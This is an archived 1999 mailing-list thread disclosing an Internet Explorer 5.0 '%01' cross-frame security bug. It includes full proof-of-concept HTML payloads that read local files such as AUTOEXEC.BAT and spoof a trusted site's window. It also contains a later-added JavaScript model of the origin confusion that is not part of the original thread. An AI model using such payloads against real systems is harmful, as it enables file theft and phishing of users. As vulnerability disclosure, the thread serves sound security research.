msie.5.0-0.001.percent.txt

Date: 17 Aug 1999. Reported by Georgi Guninski. Type: packetstorm. Source: packetstormsecurity.com

Security bug in Internet Explorer 5.0 bypasses Cross-frame security, allows file reading and spoofing.

Code
`Date: Fri, 9 Apr 1999 07:15:12 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: IE 5.0 security vulnerabilities - %01 bug again  
  
There is a security bug in Internet Explorer 5.0 which circumvents  
"Cross-frame security" and opens several security holes.  
  
This is a modification of the "%01 security bug" (that was fixed in IE  
5.0) I found in January.  
  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet  
Component", IE thinks that the document is loaded from the domain of 'someURL'.  
  
Some of the vulnerabilities are:  
  
1) IE allows reading local files and sending them to an arbitrary server.  
The filename must be known.  
  
The bug may be exploited using HTML mail message.  
  
Demo is available at: http://www.nat.bg/~joro/scriptlet.html  
  
2) IE allows "window spoofing".  
After visiting a hostile page (or clicking a hostile link) a window is  
opened and its location is a trusted site. However, the content of the   
window is not that of the original site, but it is supplied by the owner   
of the page. So, the user is misled he is browsing a trusted site, while   
he is browsing a hostile page and may provide sensitive information,  
such as credit card number.  
  
The bug may be exploited using HTML mail message.  
  
Demo is available at: http://www.nat.bg/~joro/scrspoof.html  
  
  
Workaround: Disable Javascript  
  
Regards,  
Georgi Guninski  
  
----------------------------------------------------------------------------------  
  
[http://www.nat.bg/~joro/scriptlet.html]  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "%01" security vulnerability - file reading  
</TITLE>  
</HEAD>  
  
  
<BODY>  
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and   
opens several security holes.  
<BR>  
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.  
<BR>  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is   
loaded from the domain of 'someURL'.  
  
This page demonstrates reading local files.  
  
<BR>  
  
Workaround: Disable Javascript  
  
<BR>  
  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
  
<OBJECT  
classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"  
>  
<PARAM NAME="URL" value="about:<SCRIPT>alert('Create a short file C:\\test.txt and it will be read and shown in a message box');a=window.open('file://c:/test.txt');alert(a.document.body.innerText);a.close();</SCRIPT>%01file://c:/">  
</OBJECT>  
</BODY>  
</HTML>  
  
----------------------------------------------------------------------------------  
  
[http://www.nat.bg/~joro/scrspoof.html]  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "%01" security vulnerability - window spoofing  
</TITLE>  
</HEAD>  
  
  
<BODY>  
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and   
opens several security holes.  
<BR>  
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.  
<BR>  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is   
loaded from the domain of 'someURL'.  
  
This page demonstrates spoofing windows.  
  
<BR>  
  
Workaround: Disable Javascript  
  
<BR>  
  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
  
<OBJECT  
classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"  
>  
<PARAM NAME="URL" value="about:<SCRIPT>a=window.open('http://www.yahoo.com');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF=http://www.nat.bg/~joro>Go to Georgi Guninski home page</A></H1></BODY></HTML>');</SCRIPT>%01http://www.yahoo.com">  
</OBJECT>  
</BODY>  
</HTML>  
  
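To illustrate the origin confusion the advisory describes, here is an added JavaScript model (not code from the advisory, nor from Microsoft's Scriptlet component): a naive resolver that derives the security zone from the text after the %01 byte while loading the text before it, beside a strict resolver that rejects control characters and derives the zone from exactly the string it loads. The regex-based `originOf`, the `resolveNaive`/`resolveStrict` names and the constructed sample URL are assumptions made for this example.

```javascript
// Added example, not part of the original advisory. Models the two halves of
// the "%01" confusion: which URL gets loaded versus which URL the security
// zone (origin) is computed from.

// Decode %XX escapes byte-wise, which is how the %01 reaches the parser.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Origin = scheme plus host; about: and file: style URLs have an empty or
// drive-letter "host". Hypothetical helper, not IE's real zone logic.
function originOf(url) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):(?:\/\/([^\/?#]*))?/.exec(url);
  if (!m) return null;
  return { scheme: m[1].toLowerCase(), host: (m[2] || "").toLowerCase() };
}

// Vulnerable model: the content before \x01 is what gets loaded, but the
// origin is taken from the URL after \x01 (the advisory's 'someURL').
function resolveNaive(rawUrl) {
  const decoded = percentDecode(rawUrl);
  const cut = decoded.indexOf("\x01");
  const loadPart = cut === -1 ? decoded : decoded.slice(0, cut);
  const zonePart = cut === -1 ? decoded : decoded.slice(cut + 1);
  return { load: loadPart, origin: originOf(zonePart) };
}

// Hardened model: reject any C0 control byte (or DEL) after decoding, and
// derive the origin from the very string that will be loaded.
function resolveStrict(rawUrl) {
  const decoded = percentDecode(rawUrl);
  if (/[\x00-\x1f\x7f]/.test(decoded)) {
    return { error: "control character in URL" };
  }
  return { load: decoded, origin: originOf(decoded) };
}

// Constructed sample with the same shape as the advisory's PARAM value:
// inline about: content followed by %01 and a trusted-looking URL.
const SAMPLE = "about:<SCRIPT>/* inline script */</SCRIPT>%01file://c:/";

const naive = resolveNaive(SAMPLE);
const strict = resolveStrict(SAMPLE);
console.log(naive.load, "->", naive.origin.scheme); // about: content, but file zone
console.log(strict.error);                          // rejected before any zone is assigned
```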
----------------------------------------------------------------------------------  
  
Date: Fri, 9 Apr 1999 08:38:09 -0400  
From: Eric Stevens <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Is there any way to exploit this with files that are not recognized as text.  
Example, I tried modifying your code to c:\autoexec.bat and  
c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
file, I instead received an Open/Save As dialog. Open tries to execute the  
bat file or edit the ini file in the temp folder where it was downloaded,  
and save as does the obvious. This problem exists on both versions of IE5  
that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
exploited against anything but text files as it's not terribly likely that  
you have any sensitive information sitting around in text files whose names  
are likely to be guessed.  
  
----] quote [----  
>1) IE allows reading local files and sending them to an arbitrary  
>server.  
>The filename must be known.  
>  
>The bug may be exploited using HTML mail message.  
>  
----] end quote [----  
  
----------------------------------------------------------------------------------  
  
Date: Sat, 10 Apr 1999 20:51:47 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Eric Stevens wrote:  
>  
> Is there any way to exploit this with files that are not recognized as text.  
  
Yes, there is such a way. You must use TDC to read files with extensions  
different from .txt or .html.  
  
Demonstration of reading AUTOEXEC.BAT is available at:  
http://www.nat.bg/~joro/scrauto.html  
  
> Example, I tried modifying your code to c:\autoexec.bat and  
> c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
> file, I instead received an Open/Save As dialog. Open tries to execute the  
> bat file or edit the ini file in the temp folder where it was downloaded,  
> and save as does the obvious. This problem exists on both versions of IE5  
> that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
> 5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
> exploited against anything but text files as it's not terribly likely that  
> you have any sensitive information sitting around in text files whose names  
> are likely to be guessed.  
>  
  
Regards,  
Georgi Guninski  
  
[http://www.nat.bg/~joro/scrauto.html]  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "%01" security vulnerability - reading AUTOEXEC.BAT  
</TITLE>  
</HEAD>  
  
  
<BODY>  
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and   
opens several security holes.  
<BR>  
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.  
<BR>  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is   
loaded from the domain of 'someURL'.  
  
This page demonstrates reading AUTOEXEC.BAT.  
  
<BR>  
  
Workaround: Disable Javascript  
  
<BR>  
  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
  
<OBJECT  
classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"  
>  
<PARAM NAME="URL" value="about:<object id='myTDC' width=100 height=100 classid='CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83'><param name='DataURL' value='c:/autoexec.bat'><param name='UseHeader' value=False><param name='CharSet' VALUE='iso-8859-1'><param name='FieldDelim' value='}'><param name='RowDelim' value='}'><param name='TextQualifier' value='}'></object><form><textarea datasrc='#myTDC' datafld='Column1' rows=10 cols=80></textarea></form><SCRIPT>s='Here is your AUTOEXEC.BAT:\n\n';setTimeout('alert(s+document.forms[0].elements[0].value)',4000)</SCRIPT>%01file://c:/">  
</OBJECT>  
</BODY>  
</HTML>  
  
----------------------------------------------------------------------------------  
  
Date: Fri, 9 Apr 1999 15:05:07 -0700  
From: Ryan Russell <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Since it's an NT box, did you try using the ::$DATA  
feature in conjunction with this bug?  
  
Ryan  
  
> Is there any way to exploit this with files that are not recognized as text.  
> Example, I tried modifying your code to c:\autoexec.bat and  
> c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
> file, I instead received an Open/Save As dialog. Open tries to execute the  
> bat file or edit the ini file in the temp folder where it was downloaded,  
> and save as does the obvious. This problem exists on both versions of IE5  
> that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
> 5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
> exploited against anything but text files as it's not terribly likely that  
> you have any sensitive information sitting around in text files whose names  
> are likely to be guessed.  
  
----------------------------------------------------------------------------------  
  
Date: Mon, 12 Apr 1999 22:59:36 -0700  
From: adam <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Forgive me if this has been mentioned.  
  
The bug also exists on ie 4. A similar one is possible with netscape.  
  
On Sat, 10 Apr 1999, Georgi Guninski wrote:  
  
> Eric Stevens wrote:  
> >  
> > Is there any way to exploit this with files that are not recognized as text.  
>  
> Yes, there is such a way. You must use TDC to read files with extensions  
> different from .txt or .html.  
>  
> Demonstration of reading AUTOEXEC.BAT is available at:  
> http://www.nat.bg/~joro/scrauto.html  
>  
> > Example, I tried modifying your code to c:\autoexec.bat and  
> > c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
> > file, I instead received an Open/Save As dialog. Open tries to execute the  
> > bat file or edit the ini file in the temp folder where it was downloaded,  
> > and save as does the obvious. This problem exists on both versions of IE5  
> > that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
> > 5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
> > exploited against anything but text files as it's not terribly likely that  
> > you have any sensitive information sitting around in text files whose names  
> > are likely to be guessed.  
> >  
>  
> Regards,  
> Georgi Guninski  
>  
  
`
